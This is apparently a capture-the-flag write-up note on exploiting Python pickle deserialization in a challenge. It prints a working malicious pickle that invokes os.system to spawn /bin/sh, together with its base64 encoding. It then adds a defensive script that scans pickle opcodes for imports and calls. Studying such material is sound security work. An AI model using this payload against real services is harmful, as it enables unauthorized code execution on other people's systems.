

The interesting function is `import`.
Breaking the `import` function gives us an error.

So it wants a **base64**-encoded pickle object, and we need to read the flag. Let's get a shell using a malicious pickle object.
Reading: https://checkoway.net/musings/pickle/
```
cos
system
(S'/bin/sh'
tR.
```
Base64-encoding that gives us:
`Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4=`
and passing that to the program...
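
Seen from the receiving side, a blob like this can be triaged without ever unpickling it. The sketch below is an added example, not part of the original write-up or the challenge's code; `inspect_pickle_b64` and its reject rule are assumptions for illustration, built on the standard-library `pickletools.genops` to list the imports and call opcodes in the stream.

```python
import base64
import pickletools

# Opcodes that resolve an importable name, and opcodes that call one.
IMPORT_OPS = {"GLOBAL", "INST", "STACK_GLOBAL"}
CALL_OPS = {"REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD"}

# The base64 blob from the write-up above (decodes to the cos/system pickle).
WRITEUP_BLOB = "Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4="


def inspect_pickle_b64(blob_b64):
    """Walk the opcode stream of a base64 pickle without unpickling it."""
    raw = base64.b64decode(blob_b64, validate=True)
    imports, calls, strings = [], [], []
    try:
        for opcode, arg, _pos in pickletools.genops(raw):
            if isinstance(arg, str):
                strings.append(arg)
            if opcode.name == "STACK_GLOBAL":
                # Heuristic: module and name are the last two strings pushed.
                imports.append(".".join(strings[-2:]))
            elif opcode.name in IMPORT_OPS:
                # GLOBAL/INST carry "module name" as one space-joined argument.
                imports.append(arg.replace(" ", ".", 1))
            if opcode.name in CALL_OPS:
                calls.append(opcode.name)
    except Exception as exc:  # truncated or malformed stream
        return {"imports": imports, "calls": calls, "reject": True,
                "reason": f"malformed pickle: {exc}"}
    reject = bool(imports or calls)
    reason = "imports or calls a callable" if reject else "plain data only"
    return {"imports": imports, "calls": calls, "reject": reject, "reason": reason}


if __name__ == "__main__":
    # Constructed check: run the inspector over the write-up's own payload.
    print(inspect_pickle_b64(WRITEUP_BLOB))
```

Opcode scanning like this is triage for logs and alerts, not a sandbox: the Python documentation's guidance is to never unpickle untrusted data, so the durable fix is a data-only format such as JSON.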

---
Tags: #ctf #python #pickle #deserialization #pwn
Related: [[Peak Hill]]